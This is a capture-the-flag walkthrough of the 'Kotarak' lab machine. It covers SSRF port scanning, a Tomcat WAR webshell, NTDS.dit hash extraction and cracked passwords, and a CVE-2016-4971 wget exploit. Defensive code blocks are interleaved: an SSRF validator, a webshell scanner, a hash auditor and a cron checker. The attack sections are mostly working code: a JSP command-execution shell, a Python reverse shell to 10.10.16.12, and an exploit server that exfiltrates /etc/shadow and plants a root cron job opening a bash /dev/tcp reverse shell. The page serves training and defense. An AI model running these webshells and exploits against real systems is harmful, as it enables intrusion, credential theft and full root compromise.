[Meachines] [Hard] Kotarak: SSRF port scan + AD domain ntds.dit database recovery + TRP00F shortcut + authbind privilege escalation + wget RCE privilege escalation
Word count: 1116 | 2025-08-20 18:18:05
Kotarak Penetration Testing Walkthrough
1. Information Gathering
1.1 Initial Scan
Port scan with Nmap:
nmap -p- 10.10.10.55 --min-rate 10000 -sC -sV
Open ports found:
- 22/tcp: OpenSSH 7.2p2 Ubuntu
- 8080/tcp: Apache Tomcat 8.5.5
- 60000/tcp: unknown service
1.2 Directory Brute-Forcing
Run feroxbuster against port 60000:
feroxbuster --url http://10.10.10.55:60000
2. SSRF Exploitation
2.1 Port Scanning
Port 60000 has an SSRF vulnerability that can be used to scan ports on the internal (loopback) interface:
# Ask url.php to fetch http://127.0.0.1:<port> for every TCP port and print the
# first 100 characters of any non-empty reply; empty replies mean a closed port.
time for i in {1..65535}; do
  res=$(curl -s "http://10.10.10.55:60000/url.php?path=http%3A%2F%2F127.0.0.1%3A${i}")
  len=$(echo "$res" | wc -w)
  if [ "$len" -gt 0 ]; then
    echo -n "${i}: "
    echo "$res" | tr -d "\r" | head -1 | cut -c-100
  fi
done
Port 888 responds; access it through the same SSRF:
view-source:http://10.10.10.55:60000/url.php?path=http%3a%2f%2f127.0.0.1%3a888%3fdoc%3dbackup
This yields Tomcat credentials:
- Username: admin
- Password: 3@g01PdhB!
3. Exploiting the Tomcat Manager
3.1 Uploading a WAR Backdoor
Open the Tomcat manager interface:
http://10.10.10.55:8080/manager/html
Log in with the credentials obtained and upload a WAR backdoor.
Script to build the WAR file:
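The loop above works because url.php fetches whatever the path parameter names, loopback included. The following is an added example, not code from the page or from the Kotarak box, of the validation such a fetcher needs before it makes the request: a scheme allowlist, a port allowlist, rejection of userinfo, and a resolve-then-check step that refuses any address in loopback, private, link-local or other non-routable space. The allowlists, the constructed FAKE_DNS table and the host names in it are assumptions made for the example.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Added example (not code from the page): validator for a user-supplied URL
# that a server-side fetcher such as url.php?path= would otherwise request blindly.
# The policy knobs below are assumptions for the example.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


class FetchRejected(ValueError):
    """Raised when a URL must not be fetched on the user's behalf."""


def default_resolver(host):
    """Resolve a hostname to the set of every address it maps to."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


# Constructed DNS table so the example runs offline; these are not real hosts.
FAKE_DNS = {
    "localhost": {"127.0.0.1", "::1"},
    "intranet.example": {"10.0.0.5"},
    "cdn.example": {"8.8.8.8", "10.0.0.9"},   # split answer: one internal address
    "public.example": {"8.8.8.8"},
}


def fake_resolver(host):
    if host not in FAKE_DNS:
        raise socket.gaierror("constructed resolver: unknown host %r" % host)
    return FAKE_DNS[host]


def is_internal(ip):
    """True for any address a server-side fetch must never reach."""
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_fetch_url(url, resolver=default_resolver):
    """Return (host, port, frozenset of IPs) if the URL may be fetched, else raise FetchRejected."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise FetchRejected("scheme not allowed: %r" % parts.scheme)
    if parts.username is not None or parts.password is not None:
        raise FetchRejected("userinfo in URL is not allowed")
    host = parts.hostname
    if not host:
        raise FetchRejected("missing host")
    try:
        port = parts.port
    except ValueError:
        raise FetchRejected("malformed port")
    if port is None:
        port = 443 if scheme == "https" else 80
    if port not in ALLOWED_PORTS:
        raise FetchRejected("port not allowed: %d" % port)
    # A literal IP is checked directly; a hostname is resolved and EVERY address
    # it returns must be external, so a split answer cannot smuggle an internal target.
    try:
        addrs = {ipaddress.ip_address(host)}
    except ValueError:
        try:
            addrs = {ipaddress.ip_address(a) for a in resolver(host)}
        except (socket.gaierror, ValueError) as exc:
            raise FetchRejected("cannot resolve %r: %s" % (host, exc))
    bad = sorted(str(a) for a in addrs if is_internal(a))
    if bad:
        raise FetchRejected("host resolves to internal address(es): %s" % ", ".join(bad))
    return host, port, frozenset(str(a) for a in addrs)


def is_allowed(url, resolver=default_resolver):
    """Boolean convenience wrapper around validate_fetch_url."""
    try:
        validate_fetch_url(url, resolver)
        return True
    except FetchRejected:
        return False


if __name__ == "__main__":
    for u in ("http://127.0.0.1:888?doc=backup", "http://localhost/", "http://public.example/"):
        print(u, "->", "allowed" if is_allowed(u, fake_resolver) else "rejected")
```

Two caveats apply when wiring this in: connect to the address that was validated (resolve once and use that IP, or re-validate after the library resolves) so a DNS answer that changes between check and use cannot bypass it, and run the same check on every redirect hop, because a 3xx from an allowed host would otherwise steer the fetcher straight back to 127.0.0.1:888.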
#!/bin/sh
# Fetch the JSP file browser and pack it as wshell.war for deployment through the Tomcat manager.
set -e
wget https://raw.githubusercontent.com/tennc/webshell/master/jsp/jspbrowser/Browser.jsp -O index.jsp
rm -rf wshell
rm -f wshell.war
mkdir wshell
cp index.jsp wshell/
cd wshell
jar -cvf ../wshell.war *
3.2 Reverse Shell
Upload a JSP file for the reverse shell (rev.jsp):
<%@ page import="java.util.*,java.io.*"%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
    if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
            out.println(disr);
            disr = dis.readLine();
        }
    }
%>
</pre>
</BODY></HTML>
Python reverse shell code (run through the JSP above):
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.12",10032));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")
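Both Browser.jsp and rev.jsp share one shape: request-controlled input handed to a process-spawning call. The block below is an added example, not code from the page or from any of the tools it uses, of hunting a Tomcat webapps tree for JSP files with that shape. The indicator patterns, the verdict thresholds, the default webapps path and the two constructed sample files are assumptions made for the example.

```python
import os
import re

# Added example (not code from the page): scan JSP sources for the indicators
# that a command-execution shell such as rev.jsp exhibits. Pattern lists and
# the sample files are assumptions for the example.
INDICATORS = {
    "process-exec": [
        re.compile(r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec\s*\("),
        re.compile(r"new\s+ProcessBuilder\s*\("),
    ],
    "request-input": [
        re.compile(r"request\s*\.\s*getParameter\s*\("),
        re.compile(r"request\s*\.\s*getHeader\s*\("),
        re.compile(r"request\s*\.\s*getInputStream\s*\("),
    ],
    "reflection": [
        re.compile(r"Class\s*\.\s*forName\s*\("),
        re.compile(r"defineClass\s*\("),
    ],
    "raw-file-access": [
        re.compile(r"new\s+File(?:Input|Output)?Stream\s*\("),
        re.compile(r"new\s+File\s*\("),
    ],
}


def indicators_in(source):
    """Sorted names of every indicator group that matches one JSP source string."""
    return sorted(name for name, pats in INDICATORS.items()
                  if any(p.search(source) for p in pats))


def classify(source):
    """'webshell' when request input meets process execution, 'suspicious' for
    process execution or reflection alone, otherwise 'clean'."""
    hits = indicators_in(source)
    if "process-exec" in hits and "request-input" in hits:
        return "webshell"
    if "process-exec" in hits or "reflection" in hits:
        return "suspicious"
    return "clean"


def scan_sources(named_sources):
    """named_sources: iterable of (path, source). Returns (path, verdict, hits) for non-clean files."""
    results = []
    for path, src in named_sources:
        verdict = classify(src)
        if verdict != "clean":
            results.append((path, verdict, indicators_in(src)))
    return results


def iter_jsp_files(root):
    """Yield (path, source) for every .jsp/.jspx below root (e.g. Tomcat's webapps directory)."""
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if fn.lower().endswith((".jsp", ".jspx")):
                p = os.path.join(dirpath, fn)
                with open(p, "r", encoding="utf-8", errors="replace") as fh:
                    yield p, fh.read()


# Constructed samples: a fragment shaped like rev.jsp above, and a benign page.
SAMPLE_SHELL = '''<%@ page import="java.util.*,java.io.*"%>
<% if (request.getParameter("cmd") != null) {
     Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
   } %>'''
SAMPLE_BENIGN = '''<%@ page contentType="text/html" %>
<html><body>Hello, <%= request.getParameter("name") %></body></html>'''

if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "/opt/tomcat/webapps"  # assumed path
    for path, verdict, hits in scan_sources(iter_jsp_files(root)):
        print("%-10s %s  [%s]" % (verdict, path, ", ".join(hits)))
```

Signature matching of this kind catches the stock shells that get uploaded through an exposed manager; an encoded or string-concatenated shell evades it, so pair the scan with a check of the manager's access log for deploy requests and with file-modification times under webapps.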
4. Recovering the NTDS.dit Database
4.1 Downloading the Database Files
Browse to the archive directory through the webshell:
http://10.10.10.55:8080/wshell/index.jsp?sort=1&dir=%2fhome%2ftomcat%2fto_archive%2fpentest_data
Download the two key files:
- 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit
- 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin
4.2 Extracting Hashes
Extract the hashes with impacket-secretsdump (the .bin file is the SYSTEM hive that holds the boot key):
impacket-secretsdump -ntds 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit -system 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin LOCAL
Hashes obtained:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN-3G2B0H151AC$:1000:aad3b435b51404eeaad3b435b51404ee:668d49ebfdb70aeee8bcaeac9e3e66fd:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ca1ccefcb525db49828fbb9d68298eee:::
WIN2K8$:1103:aad3b435b51404eeaad3b435b51404ee:160f6c1db2ce0994c19c46a349611487:::
WINXP1$:1104:aad3b435b51404eeaad3b435b51404ee:6f5e87fd20d1d8753896f6c9cb316279:::
WIN2K31$:1105:aad3b435b51404eeaad3b435b51404ee:cdd7a7f43d06b3a91705900a592f3772:::
WIN7$:1106:aad3b435b51404eeaad3b435b51404ee:24473180acbcc5f7d2731abe05cfa88c:::
atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
4.3 Cracking the Hashes
Crack the hashes with an online service (e.g. crackstation.net), which gives:
- Administrator: f16tomcat!
- atanas: Password123!
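Before anything is cracked, the dump itself already tells a defender several things: the Guest account's NT hash is the hash of the empty password, every LM field holds the "no LM hash" value, and the Administrator password cracked above is the same one that later opens the Linux atanas account. The block below is an added example, not code from the page or from impacket, that parses secretsdump output and flags those conditions plus password reuse across accounts. The regular expression, the finding texts and the summary format are assumptions for the example; the sample dump is the one shown in section 4.2.

```python
import re
from collections import defaultdict

# Added example (not code from the page): triage a secretsdump-style hash dump.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # value stored when no LM hash exists
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::"
)


def parse_dump(text):
    """Parse user:rid:lm:nt::: lines; banner and progress lines are skipped."""
    entries = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        user = m.group("user").split("\\")[-1]   # drop a DOMAIN\ prefix if present
        entries.append({
            "user": user,
            "rid": int(m.group("rid")),
            "lm": m.group("lm").lower(),
            "nt": m.group("nt").lower(),
            "machine": user.endswith("$"),
        })
    return entries


def audit(entries):
    """Return a sorted list of (account, finding) pairs."""
    findings = []
    by_nt = defaultdict(list)
    for e in entries:
        if e["nt"] == EMPTY_NT:
            findings.append((e["user"], "empty password"))
        if e["lm"] != EMPTY_LM:
            findings.append((e["user"], "LM hash stored (trivially crackable)"))
        if e["rid"] == 500 and e["user"].lower() != "administrator":
            findings.append((e["user"], "renamed built-in Administrator (RID 500)"))
        by_nt[e["nt"]].append(e["user"])
    # Identical NT hashes mean identical passwords: one crack opens every account in the group.
    for nt, users in by_nt.items():
        if len(users) > 1 and nt != EMPTY_NT:
            findings.append(("/".join(sorted(users)), "same password on multiple accounts"))
    return sorted(findings)


def summarize(entries):
    """Count user and machine accounts in the dump."""
    return {
        "users": sum(1 for e in entries if not e["machine"]),
        "machines": sum(1 for e in entries if e["machine"]),
    }


# The dump exactly as shown in section 4.2.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN-3G2B0H151AC$:1000:aad3b435b51404eeaad3b435b51404ee:668d49ebfdb70aeee8bcaeac9e3e66fd:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ca1ccefcb525db49828fbb9d68298eee:::
WIN2K8$:1103:aad3b435b51404eeaad3b435b51404ee:160f6c1db2ce0994c19c46a349611487:::
WINXP1$:1104:aad3b435b51404eeaad3b435b51404ee:6f5e87fd20d1d8753896f6c9cb316279:::
WIN2K31$:1105:aad3b435b51404eeaad3b435b51404ee:cdd7a7f43d06b3a91705900a592f3772:::
WIN7$:1106:aad3b435b51404eeaad3b435b51404ee:24473180acbcc5f7d2731abe05cfa88c:::
atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
"""

if __name__ == "__main__":
    entries = parse_dump(SAMPLE_DUMP)
    print(summarize(entries))
    for account, finding in audit(entries):
        print("%-20s %s" % (account, finding))
```

Cross-system reuse, the Windows Administrator password unlocking a Linux user, is invisible to a single dump; it shows up only when the cracked values are compared against the other systems' authentication records, which is the check this box's root path depends on nobody having done.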
5. Privilege Escalation
5.1 Switching to the atanas User
su atanas
Password: f16tomcat!
User flag:
93f844f50491ef797c9c1b601b4bece8
5.2 TRP00F Exploitation
Use the TRP00F tool for privilege escalation:
python3 trp00f.py --lhost 10.10.16.12 --lport 10012 --rhost 10.10.16.12 --rport 10011 --http 1111
Choose the pkexec exploit.
5.3 Wget Exploitation (CVE-2016-4971)
5.3.1 Preparing the Malicious .wgetrc
echo "post_file = /etc/shadow" > .wgetrc
echo "output_document = /etc/cron.d/wget-root-shell" >> .wgetrc
5.3.2 Starting the FTP Server
python -m pyftpdlib -p 21 -w
5.3.3 Exploit Script
# wget-exploit.py
# CVE-2016-4971
import SimpleHTTPServer
import SocketServer
import socket
import sys


class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
    def do_GET(self):
        # This takes care of sending .wgetrc
        print "We have a volunteer requesting " + self.path + " by GET :)\n"
        if "Wget" not in self.headers.getheader('User-Agent', ''):
            print "But it's not a Wget :( \n"
            self.send_response(200)
            self.end_headers()
            self.wfile.write("Nothing to see here...")
            return
        print "Uploading .wgetrc via ftp redirect vuln. It should land in /root \n"
        self.send_response(301)
        new_path = '%s' % ('ftp://anonymous@%s:%s/.wgetrc' % (FTP_HOST, FTP_PORT))
        print "Sending redirect to %s \n" % (new_path)
        self.send_header('Location', new_path)
        self.end_headers()

    def do_POST(self):
        # In here we will receive extracted file and install a PoC cronjob
        print "We have a volunteer requesting " + self.path + " by POST :)\n"
        if "Wget" not in self.headers.getheader('User-Agent', ''):
            print "But it's not a Wget :( \n"
            self.send_response(200)
            self.end_headers()
            self.wfile.write("Nothing to see here...")
            return
        content_len = int(self.headers.getheader('content-length', 0))
        post_body = self.rfile.read(content_len)
        print "Received POST from wget, this should be the extracted /etc/shadow file: \n\n---[begin]---\n %s \n---[eof]---\n\n" % (post_body)
        print "Sending back a cronjob script as a thank-you for the file..."
        print "It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)"
        self.send_response(200)
        self.send_header('Content-type', 'text/plain')
        self.end_headers()
        self.wfile.write(ROOT_CRON)
        print "\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n"
        return


HTTP_LISTEN_IP = '10.0.3.1'   # address the HTTP listener binds to; must be the address the target's wget reaches
HTTP_LISTEN_PORT = 80
FTP_HOST = '10.10.16.12'      # the pyftpdlib server started in 5.3.2
FTP_PORT = 21
ROOT_CRON = """* * * * * root bash -c 'bash -i >& /dev/tcp/10.10.16.12/10099 0>&1' \n"""

handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)
print "Ready? Is your FTP server running?"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((FTP_HOST, FTP_PORT))
if result == 0:
    print "FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT)
else:
    print "FTP is down :( Exiting."
    sys.exit(1)
print "Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT
handler.serve_forever()
5.3.4 Running the Exploit (authbind lets an unprivileged user bind port 80)
authbind python2 wget-exploit.py
Root access arrives after roughly four minutes, once the cron job has fetched the page and the dropped cron entry has fired.
Root flag:
950d1425795dfd38272c93ccbb63ae2c
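The chain in 5.3 needs three things on the victim side: a wget older than 1.18 (which saved an FTP-redirected download under the name the FTP server supplied), a recurring privileged wget invocation without a fixed output file, and a working directory where the dropped .wgetrc is honoured (cron runs jobs in the user's home, so for a root job that is /root). The block below is an added example, not code from the page or from wget, that audits a host for those preconditions. The version banner format follows GNU wget's "GNU Wget X.Y.Z" output; the crontab sample, the check names and the heuristics are assumptions for the example.

```python
import re
import subprocess

# Added example (not code from the page): audit the victim-side preconditions of
# the CVE-2016-4971 chain. Cron sample and heuristics are assumptions for the example.
FIXED_VERSION = (1, 18)   # wget 1.18 stopped trusting the FTP-supplied file name


def parse_wget_version(banner):
    """'GNU Wget 1.17.1 built on linux-gnu.' -> (1, 17, 1)"""
    m = re.search(r"GNU Wget (\d+(?:\.\d+)*)", banner)
    if not m:
        raise ValueError("not a wget --version banner")
    return tuple(int(x) for x in m.group(1).split("."))


def wget_is_vulnerable(banner):
    """True when the reported version predates the 1.18 fix."""
    return parse_wget_version(banner) < FIXED_VERSION


def installed_wget_banner():
    """Output of the local 'wget --version', or None when wget is not installed."""
    try:
        return subprocess.run(["wget", "--version"], capture_output=True,
                              text=True, check=False).stdout
    except FileNotFoundError:
        return None


OUTPUT_FLAG = re.compile(r"(?:^|\s)(?:-[a-zA-Z]*O\b|--output-document\b)")
NO_REDIRECT = re.compile(r"(?:^|\s)--max-redirect[= ]0\b")


def audit_cron_lines(lines):
    """Inspect system-crontab lines (5 time fields, user, command) and return
    (user, command, issues) for every wget invocation found."""
    findings = []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue  # blank, comment, or environment assignment such as PATH=
        parts = line.split(None, 6)
        if len(parts) < 7:
            continue  # @reboot-style or malformed entries are out of scope here
        user, cmd = parts[5], parts[6]
        if not re.search(r"\bwget\b", cmd):
            continue
        issues = []
        if user == "root":
            issues.append("runs as root")
        if not OUTPUT_FLAG.search(cmd):
            issues.append("no -O/--output-document: the server picks the file name")
        if not NO_REDIRECT.search(cmd):
            issues.append("redirects are followed (default)")
        if not re.search(r"\bcd\s", cmd):
            issues.append("cwd is the user's home, where wget reads .wgetrc")
        findings.append((user, cmd, issues))
    return findings


# Constructed /etc/cron.d sample; not the target's real cron table.
SAMPLE_CRON = """\
# constructed sample
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
* * * * * root wget http://203.0.113.10/status.txt
*/5 * * * * backup cd /var/tmp && wget -q --max-redirect=0 -O /var/tmp/feed.xml http://203.0.113.10/feed.xml
0 3 * * * root /usr/bin/updatedb
"""

if __name__ == "__main__":
    banner = installed_wget_banner()
    if banner:
        ver = ".".join(map(str, parse_wget_version(banner)))
        print("wget %s -> %s" % (ver, "VULNERABLE" if wget_is_vulnerable(banner) else "patched"))
    for user, cmd, issues in audit_cron_lines(SAMPLE_CRON.splitlines()):
        print("%s: %s" % (user, cmd))
        for issue in issues:
            print("   - " + issue)
```

The second sample line shows the shape a privileged fetch should have even on a patched wget: a fixed output path, redirects disabled, and an explicit working directory, which removes every lever the exploit script above pulls.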
6. Key Takeaways
- Internal services discovered through the SSRF vulnerability
- Initial access gained with the Tomcat default credentials
- Webshell upload leading to a reverse shell
- NTDS.dit database recovered and hashes extracted
- Privilege escalation with the TRP00F tool
- Root obtained through the wget vulnerability (CVE-2016-4971)
The full chain ran from information gathering to root, exercising several distinct exploitation techniques.